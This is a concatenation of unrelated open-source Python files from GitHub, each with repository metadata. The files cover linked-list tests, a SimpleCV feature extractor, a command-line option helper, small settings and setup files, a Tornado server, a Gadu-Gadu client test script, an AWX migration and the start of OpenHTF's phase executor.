assert node.prev is None and node.next is None and node.val == 27
def test_new_node_optional(new_dll):
"""Testing optional parameters on the newly created node."""
node2 = DoubleNode(10)
node3 = DoubleNode(11)
node1 = DoubleNode(17, node2, node3)
assert node1.prev is node2 and node1.next is node3
def test_append(new_dll):
"""Testing the append function to add to the tail of the node."""
new_dll.append('11')
assert new_dll.tail.val == "11"
def test_append_to_non_empty(new_dll):
"""Testing append to Node with value."""
new_dll.append(3)
new_dll.append(2)
new_dll.append(1)
assert new_dll.tail.val == 1
assert new_dll.tail.prev.val == 2
assert new_dll.tail.prev.next.val == 1
assert new_dll.tail.prev.prev.val == 3
def test_pop_empty(new_dll):
"""Test to pop the head off from the node and return it."""
with pytest.raises(IndexError):
new_dll.pop()
def test_pop_length_one(new_dll):
"""Test pop on dll of length one."""
new_dll.push(42)
new_dll.pop()
assert new_dll.head is None and new_dll.tail is None
def test_pop_length_one_return_val(new_dll):
"""Test pop return value."""
new_dll.push(42)
assert new_dll.pop() == 42
def test_push_twice(new_dll):
"""Test ability to push more than once."""
new_dll.push("brandy")
new_dll.push("chardonnay")
assert new_dll.head.val == "chardonnay" and new_dll.tail.val == "brandy"
def test_push_multiple(init_dll):
"""Test ability to push more than once."""
assert init_dll.head.val == 3
assert init_dll.head.next.val == 2
assert init_dll.head.next.next.val == init_dll.tail.val
def test_shift_from_empty(new_dll):
"""Test shift from empty raises exception."""
with pytest.raises(IndexError):
new_dll.shift()
def test_shift_on_one_long(new_dll):
"""Test shift on dll with length of one."""
new_dll.push("spaghetti")
new_dll.shift()
assert new_dll.head is None and new_dll.tail is None
def test_shift_on_two_long(new_dll):
"""Test shift on dll with length of two."""
new_dll.push(3)
new_dll.push(4)
new_dll.shift()
assert new_dll.head.val == 4
assert new_dll.tail is new_dll.head
def test_shift_on_more_than_two_long(init_dll):
"""Test shift on dll longer than one."""
init_dll.shift()
assert init_dll.tail.val == 2 and init_dll.head.val == 3
def test_shift_tail_next_is_none(init_dll):
"""Test shift sets tail.next to None."""
init_dll.shift()
assert init_dll.tail.next is None
def test_remove(init_dll):
"""Remove node from dll."""
init_dll.remove(2)
assert init_dll.head.next.val == 1
assert init_dll.tail.prev.val == 3
def test_remove_empty(new_dll):
"""Test remove will raise exception."""
with pytest.raises(IndexError):
new_dll.remove("the answer is")
def test_remove_length_one(new_dll):
"""Test remove on dll with length of one."""
new_dll.push("heydo")
new_dll.remove("heydo")
assert new_dll.head is None and new_dll.tail is None
def test_remove_not_in_list(init_dll):
"""Test remove raises exception if value to be removed is not in list."""
with pytest.raises(ValueError):
init_dll.remove(42)
def test_remove_head(init_dll):
"""Test remove on first node."""
init_dll.remove(3)
assert init_dll.head.val == 2 and init_dll.head.prev is None
def test_remove_tail(init_dll):
"""Test remove on last node."""
init_dll.remove(1)
assert init_dll.tail.val == 2
assert init_dll.tail.next is None
assert init_dll.tail.prev is init_dll.head
def test_pop_off(init_dll):
    """Test that after pop() the new head's prev pointer is cleared to None."""
    init_dll.pop()
    assert init_dll.head.prev is None
def test_invalid_iterable_constructor_parameter():
"""Test error is raised if invalid iterable is passed as arg to init."""
with pytest.raises(ValueError):
DoublyLinkedList(34)
| {
"content_hash": "7fc5aa0894586c0f006f9b37211cf461",
"timestamp": "",
"source": "github",
"line_count": 182,
"max_line_length": 77,
"avg_line_length": 25.917582417582416,
"alnum_prop": 0.6533813864744541,
"repo_name": "fordf/data-structures",
"id": "9dd12d4dd533b90931a1f1db907bf33cdfb738be",
"size": "4717",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_dll.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "112611"
}
],
"symlink_target": ""
} |
from SimpleCV.base import *
from SimpleCV.ImageClass import Image
from SimpleCV.Features.FeatureExtractorBase import *
class EdgeHistogramFeatureExtractor(FeatureExtractorBase):
    """
    Create a 1D edge length histogram and 1D edge angle histogram.

    This extractor applies a line detector to an image and histograms the
    length and direction of the detected lines.

    bins = the number of bins in each of the two histograms
    """
    # Default bin count; overridden per instance in __init__.
    mNBins = 10

    def __init__(self, bins=10):
        self.mNBins = bins

    def extract(self, img):
        """
        Extract the line orientation and length histograms.

        Returns a flat list of 2 * mNBins floats: the normalized length
        histogram bins followed by the normalized angle histogram bins.
        """
        #I am not sure this is the best normalization constant.
        retVal = []
        p = max(img.width,img.height)/2
        minLine = 0.01*p
        gap = 0.1*p
        fs = img.findLines(threshold=10,minlinelength=minLine,maxlinegap=gap)
        ls = fs.length()/p #normalize to image length
        angs = fs.angle()
        # NOTE(review): np.histogram's `normed` kwarg was deprecated and later
        # removed in modern NumPy (`density=True` is the replacement) — confirm
        # the NumPy version this project pins before changing.
        lhist = np.histogram(ls,self.mNBins,normed=True,range=(0,1))
        ahist = np.histogram(angs,self.mNBins,normed=True,range=(-180,180))
        retVal.extend(lhist[0].tolist())
        retVal.extend(ahist[0].tolist())
        return retVal

    def getFieldNames(self):
        """
        Return the names of all of the length and angle fields,
        in the same order extract() emits them (Length0..N, then Angle0..N).
        """
        retVal = []
        for i in range(self.mNBins):
            name = "Length"+str(i)
            retVal.append(name)
        for i in range(self.mNBins):
            name = "Angle"+str(i)
            retVal.append(name)
        return retVal
    # NOTE(review): the string below is a bare class-level expression, not a
    # docstring attached to any method; kept as-is for byte fidelity.
    """
    This method gives the names of each field in the feature vector in the
    order in which they are returned. For example, 'xpos' or 'width'
    """
    def getNumFields(self):
        """
        Return the total number of fields in the feature vector
        (length bins + angle bins).
        """
        return self.mNBins*2
| {
"content_hash": "c828654f417292df57c39cfad0f2ce5a",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 78,
"avg_line_length": 31.225806451612904,
"alnum_prop": 0.5945247933884298,
"repo_name": "intelie/pycollector",
"id": "2acc5979a4794f8e11ba63f1c6e96efda2ed08ca",
"size": "1936",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/third/SimpleCV/Features/EdgeHistogramFeatureExtractor.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "30766"
},
{
"name": "CSS",
"bytes": "17"
},
{
"name": "Perl",
"bytes": "1832"
},
{
"name": "Python",
"bytes": "5233411"
},
{
"name": "R",
"bytes": "333"
},
{
"name": "Shell",
"bytes": "2065"
}
],
"symlink_target": ""
} |
"""
example:
import optfunc
@optfunc.arghelp('rest_','input files')
def main(rest_=['-'],keyfields=1,sep='\t',usage_='-h usage'):
"-h usage" # optional: usage_ arg instead
pass
"""
from optparse import OptionParser, make_option
import sys, inspect, re
# Name of the special function argument whose default value is appended to
# the usage/help text instead of becoming an option.
doc_name='usage_'
rest_name='rest_' # remaining positional arguments into this function arg as list
# Argument names like "x_verbose" explicitly request short option "-x".
single_char_prefix_re = re.compile('^[a-zA-Z0-9]_')
# Set this to any message you want to be printed
# before the standard help
# This could include application name, description
header = 'usage: %s COMMAND [ARGS]\n\nThe available commands are:' % sys.argv[0]
# non-standard separator to use between subcommand entries in the help listing
subcommand_sep = '\n'
class ErrorCollectingOptionParser(OptionParser):
    """OptionParser variant that records errors instead of exiting.

    Parse errors are appended to self._errors rather than killing the
    process, and dest names listed in self._custom_names are mapped back
    to their original (short-prefixed) function argument names after
    parsing.
    """

    def __init__(self, *args, **kwargs):
        self._errors = []
        # Maps parsed dest name -> original function argument name.
        self._custom_names = {}
        # can't use super() because OptionParser is an old style class
        OptionParser.__init__(self, *args, **kwargs)

    def parse_args(self, argv):
        """Parse argv, renaming custom dests back to their argument names."""
        options, args = OptionParser.parse_args(self, argv)
        # BUG FIX: iterate over a snapshot of the items.  The previous
        # code iterated options.__dict__.iteritems() while deleting keys
        # from that same dict, which raises "RuntimeError: dictionary
        # changed size during iteration" as soon as a custom name matches.
        # list(...items()) also works on both Python 2 and 3.
        for k, v in list(options.__dict__.items()):
            if k in self._custom_names:
                options.__dict__[self._custom_names[k]] = v
                del options.__dict__[k]
        return options, args

    def error(self, msg):
        """Record msg instead of printing usage and exiting."""
        self._errors.append(msg)
# Numeric types optparse can coerce directly (not type='choice' choices='a|b').
optypes = [int, long, float, complex]

def optype(t):
    """Map a default value's type to an optparse `type` setting.

    bool maps to None (booleans are handled via store_true/store_false),
    recognised numeric types map to themselves, and anything else is
    treated as "string".
    """
    if t is bool:
        return None
    return t if t in optypes else "string"
def func_to_optionparser(func):
    """Build an option parser from `func`'s signature.

    Keyword arguments of `func` become command-line options whose defaults
    are the argument defaults; arguments without defaults become required
    positionals.  The special names `usage_` (extra usage text) and `rest_`
    (trailing positional args) are consumed rather than turned into options.

    Returns:
        (opt, required_args): an ErrorCollectingOptionParser and the list
        of required positional argument names.
    """
    args, varargs, varkw, defaultvals = inspect.getargspec(func)
    defaultvals = defaultvals or ()
    # Map each defaulted argument name to its default value.
    options = dict(zip(args[-len(defaultvals):], defaultvals))
    # Per-argument help strings attached by the @arghelp decorator.
    helpdict = getattr(func, 'optfunc_arghelp', {})
    def defaulthelp(examples):
        return ' (default: %s)'%examples
    # Usage line describing the rest_ catch-all positionals, if declared.
    posargshelp='\n\t(positional args):\t%s%s'% (
        helpdict.get(rest_name,''),
        defaulthelp(options[rest_name])) if rest_name in options else ''
    options.pop(rest_name, None)
    ds=func.__doc__
    if ds is None:
        ds=''
    if doc_name in options:
        # The usage_ argument's default is extra usage text, not an option.
        ds+=str(options[doc_name])
        options.pop(doc_name)
    argstart = 0
    if func.__name__ == '__init__':
        # Skip `self` when wrapping a class constructor.
        argstart = 1
    if defaultvals:
        required_args = args[argstart:-len(defaultvals)]
    else:
        required_args = args[argstart:]
    args = filter( lambda x: x != rest_name, args )

    # Build the OptionParser:
    opt = ErrorCollectingOptionParser(usage = ds+posargshelp)

    # Add the options, automatically detecting their -short and --long names
    # Reserve short names explicitly requested via the "x_name" convention
    # before auto-assigning the rest.
    shortnames = set(['h'])
    for name,_ in options.items():
        if single_char_prefix_re.match(name):
            shortnames.add(name[0])
    for argname, example in options.items():
        # They either explicitly set the short with x_blah...
        name = argname
        if single_char_prefix_re.match(name):
            short = name[0]
            name = name[2:]
            opt._custom_names[name] = argname
        # Or we pick the first letter from the name not already in use:
        else:
            short=None
            for s in name:
                if s not in shortnames:
                    short=s
                    break
        names=[]
        if short is not None:
            shortnames.add(short)
            short_name = '-%s' % short
            names.append(short_name)
        longn=name.replace('_', '-')
        long_name = '--%s' % longn
        names.append(long_name)
        if isinstance(example, bool):
            # Booleans also get a --noNAME inverse flag and take no value.
            no_name='--no%s'%longn
            opt.add_option(make_option(
                no_name, action='store_false', dest=name,help = helpdict.get(argname, 'unset %s'%long_name)
            ))
            action = 'store_true'
        else:
            action = 'store'
        examples=str(example)
        if isinstance(example, int):
            # Show the sys.maxint extremes as (-)INFINITY in help text.
            if example==sys.maxint: examples="INFINITY"
            if example==(-sys.maxint-1): examples="-INFINITY"
        help_post=defaulthelp(examples)
        kwargs=dict(action=action, dest=name, default=example,
            help = helpdict.get(argname, '')+help_post,
            type=optype(type(example)))
        opt.add_option(make_option(*names,**kwargs))
    return opt, required_args
def resolve_args(func, argv, func_name=None):
    """Parse `argv` against `func`'s signature.

    Returns:
        (kwargs, errors): a dict ready to be splatted into func(**kwargs),
        and the list of error messages collected by the parser (empty on
        success).
    """
    parser, required_args = func_to_optionparser(func)
    options, args = parser.parse_args(argv)

    # Special case for stdin/stdout/stderr: these required args are filled
    # in by run() with real stream objects rather than from the command line.
    for pipe in ('stdin', 'stdout', 'stderr'):
        if pipe in required_args:
            required_args.remove(pipe)
            setattr(options, 'optfunc_use_%s' % pipe, True)

    # Do we have correct number of required args?
    if len(required_args) > len(args):
        if not hasattr(func, 'optfunc_notstrict'):
            extra = len(parser._get_all_options()) > 1 and ' [options]' or ''
            command = sys.argv[0]
            if func_name:
                command += ' ' + func_name
            parser._errors.append("usage: %s %s%s" % (
                command, ' '.join('<%s>' % x for x in required_args), extra))

    # Ensure there are enough arguments even if some are missing
    args += [None] * (len(required_args) - len(args))
    for i, name in enumerate(required_args):
        setattr(options, name, args[i])
        # Mark consumed positionals so only leftovers reach rest_ below.
        args[i] = None
    fargs, varargs, varkw, defaults = inspect.getargspec(func)
    if rest_name in fargs:
        args = filter( lambda x: x is not None, args )
        setattr(options, rest_name, tuple(args))
    return options.__dict__, parser._errors
def run(func, argv=None, stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr,
        hide_exception_detail=False):
    """Parse argv and invoke `func`.

    `func` may be a single function, a class (its constructor's signature
    is used), or a tuple/list of functions selected by the first argv token
    as a subcommand.  Parse errors are written to stderr instead of calling
    the function; exceptions raised by the function are reported and then
    re-raised unless hide_exception_detail is set.
    """
    argv = argv or sys.argv[1:]

    # Handle multiple functions: the first argv token picks the subcommand.
    if isinstance(func, (tuple, list)):
        funcs = dict([(fn.__name__.replace('_', '-'), fn) for fn in func])
        try:
            func_name = argv.pop(0)
        except IndexError:
            func_name = None
        if func_name not in funcs:
            # Unknown or missing subcommand: list the available commands.
            def format( fn ):
                blurb = ""
                if fn.__doc__:
                    blurb = fn.__doc__.strip().split('\n')[0]
                return "  %-10s%s" % (fn.__name__.replace('_', '-'), blurb)
            names = [format(fn) for fn in func]
            s = subcommand_sep.join(names)
            stderr.write("%s\n%s\n" % (header, s) )
            return
        func = funcs[func_name]
    else:
        func_name = None

    if inspect.isfunction(func):
        resolved, errors = resolve_args(func, argv, func_name=func_name)
    elif inspect.isclass(func):
        # For a class, parse against the constructor's signature.
        if hasattr(func, '__init__'):
            resolved, errors = resolve_args(
                func.__init__, argv, func_name=func_name)
        else:
            resolved, errors = {}, []
    else:
        raise TypeError('arg is not a Python function or class')

    # Special case for stdin/stdout/stderr: inject the real stream objects
    # for any pipes flagged by resolve_args().
    for pipe in ('stdin', 'stdout', 'stderr'):
        if resolved.pop('optfunc_use_%s' % pipe, False):
            resolved[pipe] = locals()[pipe]

    if not errors:
        try:
            return func(**resolved)
        except Exception as e:
            stderr.write(str(e) + '\n')
            if not hide_exception_detail:
                raise
    else:
        stderr.write("%s\n" % '\n'.join(errors))
def caller_module(i):
    """Return the module for the stack frame `i` levels above our caller.

    For non-negative `i` one extra level is added so that this function's
    own frame is skipped; negative indices address the stack from the
    outermost frame, as with normal list indexing.
    """
    if i >= 0:
        i += 1
    frame_record = inspect.stack()[i]
    return inspect.getmodule(frame_record[0])
def main(*args, **kwargs):
    """Invoke run(*args, **kwargs) when called from a top-level script.

    The call is skipped when the caller is an imported module (so library
    imports stay side-effect free).  Returns args[0] so this also works as
    a decorator without breaking the decorated function.
    """
    mod = caller_module(1)
    if mod is None or mod.__name__ in ('<module>', '__main__'):
        run(*args, **kwargs)
    return args[0]  # So it won't break anything if used as a decorator
# Decorators
def notstrict(fn):
    """Mark `fn` so missing required arguments are tolerated at parse time."""
    fn.optfunc_notstrict = True
    return fn
def arghelp(name, help):
    """Decorator factory attaching help text for argument `name`.

    The text is stored in the decorated function's optfunc_arghelp dict,
    which func_to_optionparser later reads when building option help.
    """
    def inner(fn):
        helpmap = getattr(fn, 'optfunc_arghelp', {})
        helpmap[name] = help
        fn.optfunc_arghelp = helpmap
        return fn
    return inner
| {
"content_hash": "2a812d9f60ec29dabebcb7bb783d54bb",
"timestamp": "",
"source": "github",
"line_count": 241,
"max_line_length": 107,
"avg_line_length": 33.01244813278009,
"alnum_prop": 0.5726495726495726,
"repo_name": "Simperium/simperium-python",
"id": "1a9154fff18977ab98dec975e4cd7c526c7fb68d",
"size": "7956",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "simperium/optfunc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24977"
}
],
"symlink_target": ""
} |
# Default Webium configuration.  Any of these names may be overridden by an
# optional local_webium_settings module on the import path (see below).
from selenium.webdriver import Firefox
from selenium.webdriver.common.by import By

driver_class = Firefox  # WebDriver class used to create browser instances
implicit_timeout = 30  # seconds, driver-level implicit wait
wait_timeout = 30  # seconds, explicit wait timeout
default_search_type = By.ID  # default element locator strategy

# Local overrides: names defined in local_webium_settings replace the
# defaults above; the module being absent is not an error.
try:
    from local_webium_settings import *
except ImportError:
    pass
| {
"content_hash": "c5c67114502d275a347417a6779dca00",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 43,
"avg_line_length": 19.307692307692307,
"alnum_prop": 0.7689243027888446,
"repo_name": "drptbl/webium",
"id": "aa6228a1cd833ca0428eea3652a2691078668e60",
"size": "251",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "webium/settings.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "6616"
},
{
"name": "PowerShell",
"bytes": "519"
},
{
"name": "Python",
"bytes": "34538"
},
{
"name": "Shell",
"bytes": "415"
}
],
"symlink_target": ""
} |
def dispatch(*dispatchers, **kwargs):
    """ Dispatch
    :arg dispatchers: an iterable of pair tuples,
    each holding a dispatcher (predicate) function as its first element
    and a target function as its second.
    A dispatcher function takes the same arguments as its target and
    returns True or False; the target of the first dispatcher returning
    True is called.
    >>> f = dispatch(
    ... (lambda x: x % 2, lambda x: str(x) + "is odd"),
    ... default=lambda x: str(x) + "is even",
    ... )
    ...
    >>> print(f(3)) # say 3 is odd
    :arg default: function called when every dispatcher returns False.
    default is optional; when it is not given, None is returned instead.
    """
    # JUST FOR SUPPORTING PYTHON 2 SYNTAX
    default = kwargs.get('default')

    def routed(*args, **kw):
        for predicate, target in dispatchers:
            if predicate(*args, **kw):
                return target(*args, **kw)
        if default:
            return default(*args, **kw)

    return routed
def all_(*dispatchers):
    """ Combine :arg dispatchers: into one that routes only when every
    dispatcher returns True.
    """
    def combined(*args, **kwargs):
        for check in dispatchers:
            if not check(*args, **kwargs):
                return False
        return True
    return combined
def any_(*dispatchers):
    """ Combine :arg dispatchers: into one that routes when at least one
    dispatcher returns True.
    """
    def combined(*args, **kwargs):
        for check in dispatchers:
            if check(*args, **kwargs):
                return True
        return False
    return combined
def not_(dispatcher):
    """ Wrap :arg dispatcher: so routing happens when it returns False.
    """
    def inverted(*args, **kwargs):
        return not dispatcher(*args, **kwargs)
    return inverted
class dispatcher:
    """ Decorator adding combinator syntax to predicate functions.
    A dispatcher is just a function returning a bool, but once decorated
    it can be combined with other dispatchers using `&` and `|`, and
    inverted with `~`.
    >>> @dispatcher
    ... def even(n):
    ... return n % 2 == 0
    ...
    >>> @dispatcher
    ... def multiple_three(n):
    ... return n % 3 == 0
    ...
    >>> even & multiple_three # New dispatcher that routes when multiple of 6.
    >>> even | multiple_three # New dispatcher that routes when multiple of 2 or 3.
    >>> ~even # New dispatcher that routes when odd
    """
    def __init__(self, func):
        self.func = func

    def __call__(self, *call_args, **call_kwargs):
        return self.func(*call_args, **call_kwargs)

    def __and__(self, other):
        return type(self)(all_(self.func, other.func))

    def __or__(self, other):
        return type(self)(any_(self.func, other.func))

    def __invert__(self):
        return type(self)(not_(self.func))
| {
"content_hash": "a10ba4087ce428214ce02015a250225d",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 91,
"avg_line_length": 31.08888888888889,
"alnum_prop": 0.6208005718370264,
"repo_name": "hirokiky/wraptools",
"id": "8083108265085e03320878a00b2137fa9ba402c8",
"size": "2798",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wraptools/dispatch.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12157"
}
],
"symlink_target": ""
} |
import os
from setuptools import setup, find_packages
# NOTE(review): find_packages is imported but unused here (fakeredis ships
# as a single module via py_modules) -- confirm before removing.

# Packaging metadata for fakeredis, a fake in-memory implementation of the
# redis client API for use in tests.
setup(
    name='fakeredis',
    version='0.8.2',
    description="Fake implementation of redis API for testing purposes.",
    # long_description is read from the README.rst next to this setup.py.
    long_description=open(os.path.join(os.path.dirname(__file__),
                                       'README.rst')).read(),
    license='BSD',
    url="https://github.com/jamesls/fakeredis",
    author='James Saryerwinnie',
    author_email='js@jamesls.com',
    # Distributed as a single module, not a package.
    py_modules=['fakeredis'],
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'License :: OSI Approved :: BSD License',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
    ],
    # Mirrors the real client's API, so it depends on the redis package.
    install_requires=[
        'redis',
    ]
)
| {
"content_hash": "58685d87e8a9ae337eaecc65f7026dad",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 73,
"avg_line_length": 32.5,
"alnum_prop": 0.5798076923076924,
"repo_name": "Tinche/fakeredis",
"id": "1964d9f5992b0037120e0ef0d1ff7cd6b6478342",
"size": "1040",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "185682"
}
],
"symlink_target": ""
} |
import tornado.ioloop
import tornado.options
import tornado.httpserver

from application import Application  # project-local tornado Application subclass
import sys

from tornado.options import define, options

# --port command-line flag (tornado.options); default 8888.
define("port", default=8888, help="run on the given port", type=int)
def main():
    """Parse command-line flags and serve the Tornado application forever."""
    tornado.options.parse_command_line()
    server = tornado.httpserver.HTTPServer(Application())
    server.listen(options.port)
    # Parenthesized single-expression prints behave identically on Python 2.
    print('Development server is running at http://127.0.0.1:%s/' % options.port)
    print('Quit the server with Control-C')
    tornado.ioloop.IOLoop.instance().start()


if __name__ == "__main__":
    main()
| {
"content_hash": "42eb3abeae2998d1cb9a1a451b2358a2",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 78,
"avg_line_length": 30.526315789473685,
"alnum_prop": 0.7448275862068966,
"repo_name": "iYefeng/traits",
"id": "0c6ba2e2cfa8098f8a27332b927791ad28f3aec9",
"size": "627",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python_learn/web-demo/server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "1064"
},
{
"name": "C",
"bytes": "7999"
},
{
"name": "C++",
"bytes": "73103"
},
{
"name": "CSS",
"bytes": "12093"
},
{
"name": "Go",
"bytes": "174364"
},
{
"name": "HTML",
"bytes": "1444696"
},
{
"name": "Java",
"bytes": "179087"
},
{
"name": "JavaScript",
"bytes": "176299"
},
{
"name": "Jupyter Notebook",
"bytes": "5166603"
},
{
"name": "M4",
"bytes": "575"
},
{
"name": "Makefile",
"bytes": "5878"
},
{
"name": "Python",
"bytes": "70599"
},
{
"name": "Rust",
"bytes": "316"
},
{
"name": "Shell",
"bytes": "307"
},
{
"name": "Thrift",
"bytes": "7070"
}
],
"symlink_target": ""
} |
import os
import sys

# Make the parent directory importable so the pygglib modules resolve,
# using the platform-appropriate relative path separator.
if os.sys.platform == 'win32':
    sys.path.append(".\\..") # - for Windows
else:
    sys.path.append("../") # - for Linux

from Contacts import *
from pygglib import GGSession
from Helpers import *
from GGConstans import *
import time

#
# test account: 11327271, password eto2007
#
def login_ok_event_handler(sender, args):
    """Announce a successful login on stdout."""
    # Parenthesized single-argument print behaves identically on Python 2.
    print('Zalogowano.')
def msg_recv_event_handler(sender, args):
    """Dump the fields of a received instant message to stdout."""
    print 'Message received:'
    print 'sender:', args.sender
    print 'seq:', args.seq
    # Translate the numeric class back to its symbolic name for display.
    print 'msg_class:', GGMsgTypes.reverse_lookup(args.msg_class)
    print 'message:', args.message
    print
def on_unknown_packet_event_handler(sender, args):
    """Report a packet the library could not interpret."""
    print 'Unknow packet received: type: %d, length: %d' % (args.type, args.length)
    print
def on_send_msg_ack_event_handler(sender, args):
    """Report a message-delivery acknowledgement on stdout."""
    status_name = GGMsgStatus.reverse_lookup(args.status)
    # Parenthesized single-expression print behaves identically on Python 2.
    print('msg_send_ack received: status: %s, recipient: %d, seq: %d' % (status_name, args.recipient, args.seq))
def on_pubdir_recv_event_handler(sender, args):
print 'PubDir type', args.req_type
print 'PubDir sequence numer', args.seq
entries = args.reply.split("\0\0")
for item in entries.data:
print request_to_dict(item)
print
def on_userlist_reply(sender, args):
print 'UserListReply'
assert type(args.contacts_list) == ContactsList
print
if __name__ == "__main__":
session = GGSession(uin = 11327271, password = 'eto2007')
session.register('on_login_ok', login_ok_event_handler)
session.register('on_msg_recv', msg_recv_event_handler)
session.register('on_unknown_packet', on_unknown_packet_event_handler)
session.register('on_send_msg_ack', on_send_msg_ack_event_handler)
session.register('on_pubdir_recv', on_pubdir_recv_event_handler)
session.register('on_userlist_reply', on_userlist_reply)
session.login()
session.import_contacts_list()
session.export_contacts_list("kontakty.txt")
session.logout()
x = raw_input()
| {
"content_hash": "e6c8ce927540f25e4bf12f7fd6306870",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 136,
"avg_line_length": 32.2,
"alnum_prop": 0.6909937888198758,
"repo_name": "jakubkosinski/pygglib",
"id": "f3e8216fa638927c20ae7fcb19e4ed905077d8db",
"size": "1932",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/export_contacts_list_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "100460"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
from awx.main.migrations._create_system_jobs import create_clearsessions_jt, create_cleartokens_jt
class Migration(migrations.Migration):
    """Create the clearsessions/cleartokens system job templates and add the
    corresponding cleanup_sessions / cleanup_tokens choices to the job_type
    field on SystemJob and SystemJobTemplate."""

    dependencies = [
        ('main', '0077_v360_add_default_orderings'),
    ]

    operations = [
        # Schedule Analytics System Job Template
        # (noop reverse functions make these data migrations reversible)
        migrations.RunPython(create_clearsessions_jt, migrations.RunPython.noop),
        migrations.RunPython(create_cleartokens_jt, migrations.RunPython.noop),
        migrations.AlterField(
            model_name='systemjob',
            name='job_type',
            field=models.CharField(blank=True, choices=[('cleanup_jobs', 'Remove jobs older than a certain number of days'), ('cleanup_activitystream', 'Remove activity stream entries older than a certain number of days'), ('cleanup_sessions', 'Removes expired browser sessions from the database'), ('cleanup_tokens', 'Removes expired OAuth 2 access tokens and refresh tokens')], default='', max_length=32),
        ),
        migrations.AlterField(
            model_name='systemjobtemplate',
            name='job_type',
            field=models.CharField(blank=True, choices=[('cleanup_jobs', 'Remove jobs older than a certain number of days'), ('cleanup_activitystream', 'Remove activity stream entries older than a certain number of days'), ('cleanup_sessions', 'Removes expired browser sessions from the database'), ('cleanup_tokens', 'Removes expired OAuth 2 access tokens and refresh tokens')], default='', max_length=32),
        ),
    ]
| {
"content_hash": "832753d6e9e3569c636a38de5a19c0e0",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 407,
"avg_line_length": 58.44444444444444,
"alnum_prop": 0.697084917617237,
"repo_name": "GoogleCloudPlatform/sap-deployment-automation",
"id": "c6a00a24c1f7266df802bdc82dc4969cd006df25",
"size": "1652",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "third_party/github.com/ansible/awx/awx/main/migrations/0078_v360_clear_sessions_tokens_jt.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
from importlib import import_module
from django.apps import AppConfig as BaseAppConfig
class AppConfig(BaseAppConfig):
    """Django application config for the portal app."""

    name = "portal"

    def ready(self):
        # Import the receivers module at startup so its signal handlers
        # get registered as an import side effect.
        import_module("portal.receivers")
| {
"content_hash": "87d8543ab8adb815853994d7dedb1966",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 50,
"avg_line_length": 18.818181818181817,
"alnum_prop": 0.7294685990338164,
"repo_name": "acarl123/acuity",
"id": "b4a53a805f4c9eaf0dba91ac9cb8a530eb626afd",
"size": "207",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "portal/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "178062"
},
{
"name": "HTML",
"bytes": "1450921"
},
{
"name": "JavaScript",
"bytes": "128158"
},
{
"name": "Python",
"bytes": "10038"
},
{
"name": "Shell",
"bytes": "520"
}
],
"symlink_target": ""
} |
"""PhaseExecutor module for handling the phases of a test.
Each phase is an instance of phase_data.PhaseInfo and therefore has relevant
options. Each option is taken into account when executing a phase, such as
checking options.run_if as soon as possible and timing out at the appropriate
time.
A phase must return an openhtf.PhaseResult, one of CONTINUE, REPEAT, or STOP.
A phase may also return None, or have no return statement, which is the same as
returning openhtf.PhaseResult.CONTINUE. These results are then acted upon
accordingly and a new test run status is returned.
Phases are always run in order and not allowed to loop back, though a phase may
choose to repeat itself by returning REPEAT. Returning STOP will cause a test to
stop early, allowing a test to detect a bad state and not waste any further
time. A phase should not return TIMEOUT or ABORT, those are handled by the
framework.
"""
import collections
import inspect
import logging
import openhtf
from openhtf.exe import phase_data
from openhtf.io import test_record
from openhtf.util import argv
from openhtf.util import threads
# Fallback timeout (seconds) for phases that don't set options.timeout_s.
DEFAULT_PHASE_TIMEOUT_S = 3 * 60

ARG_PARSER = argv.ModuleParser()
# --phase_default_timeout_s rewrites DEFAULT_PHASE_TIMEOUT_S in this module.
ARG_PARSER.add_argument(
    '--phase_default_timeout_s', default=DEFAULT_PHASE_TIMEOUT_S,
    action=argv.StoreInModule, target='%s.DEFAULT_PHASE_TIMEOUT_S' % __name__,
    help='Test phase timeout in seconds')

_LOG = logging.getLogger(__name__)


class InvalidPhaseResultError(Exception):
  """Raised when a PhaseOutcome is created with an invalid phase result."""
class PhaseOutcome(collections.namedtuple('PhaseOutcome', 'phase_result')):
"""Provide some utility and sanity around phase return values.
This should not be confused with openhtf.PhaseResult. PhaseResult is an
